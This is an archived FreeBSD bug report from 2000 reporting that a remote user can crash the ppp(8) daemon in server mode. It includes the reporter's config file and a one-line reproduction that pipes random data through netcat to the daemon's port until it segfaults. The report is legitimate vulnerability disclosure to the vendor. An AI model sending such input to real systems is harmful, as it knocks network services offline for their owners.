From owner-freebsd-bugs Thu Oct 26 13:50: 8 2000
Delivered-To: freebsd-bugs@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP id A09D837B4C5
	for ; Thu, 26 Oct 2000 13:50:01 -0700 (PDT)
Received: (from gnats@localhost)
	by freefall.freebsd.org (8.9.3/8.9.2) id NAA26661;
	Thu, 26 Oct 2000 13:50:01 -0700 (PDT)
	(envelope-from gnats@FreeBSD.org)
Received: from yeti.ismedia.pl (yeti.ismedia.pl [212.182.117.178])
	by hub.freebsd.org (Postfix) with SMTP id 5945A37B479
	for ; Thu, 26 Oct 2000 13:49:29 -0700 (PDT)
Received: (qmail 87325 invoked from network); 26 Oct 2000 20:49:10 -0000
Received: from lagoon.freebsd.lublin.pl (qmailr@212.182.115.11)
	by yeti.ismedia.pl with SMTP; 26 Oct 2000 20:49:10 -0000
Received: (qmail 3546 invoked from network); 26 Oct 2000 20:49:08 -0000
Received: from riget.scene.pl (qmailr@212.182.115.2)
	by lagoon.freebsd.lublin.pl with SMTP; 26 Oct 2000 20:49:08 -0000
Received: (qmail 96971 invoked by uid 1001); 26 Oct 2000 20:49:04 -0000
Message-Id: <20001026204904.96970.qmail@riget.scene.pl>
Date: 26 Oct 2000 20:49:04 -0000
From: venglin@freebsd.lublin.pl
Reply-To: venglin@freebsd.lublin.pl
To: FreeBSD-gnats-submit@freebsd.org
X-Send-Pr-Version: 3.2
Subject: bin/22319: Malicious remote user can cause ppp(8) to segfault
Sender: owner-freebsd-bugs@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>Number:         22319
>Category:       bin
>Synopsis:       Malicious remote user can cause ppp(8) to segfault
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Thu Oct 26 13:50:01 PDT 2000
>Closed-Date:
>Last-Modified:
>Originator:     Przemyslaw Frasunek
>Release:        FreeBSD 4.1.1-STABLE i386
>Organization:
ISMEDIA
>Environment:

FreeBSD ext-fw.czuby.net 4.1.1-STABLE FreeBSD 4.1.1-STABLE #2: Fri Oct 6 13:04:26 CEST 2000 venglin@riget.scene.pl:/sys/compile/LUBI i386

Ppp(8) with server enabled (set server). Configuration file:

default:
 set device /dev/cuaa1
 set speed 115200
 set log +warning +error +alert
 nat enable yes
 set server +23 password_here
 nat unregistered_only yes
 set mtu 500
 set urgent tcp
 set urgent tcp +21 +22 +23 +6667
 set urgent udp
 set urgent udp +53 +514
 set sendpipe 1024
 set recvpipe 1024
 enable deflate24
 accept deflate24

leased:
 set ifaddr 212.182.118.90 212.182.118.89 255.255.255.252

>Description:

Look below.

>How-To-Repeat:

riget:venglin:~> cat /dev/urandom | nc ext-fw.czuby.net 23 >& /dev/null
[wait few seconds]
...
pid 580 (ppp), uid 0: exited on signal 11 (core dumped)

Sorry, I can't provide stack backtrace at this moment, I'm running PPP on
a diskless machine.

>Fix:

Unknown.

>Release-Note:
>Audit-Trail:
>Unformatted:

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-bugs" in the body of the message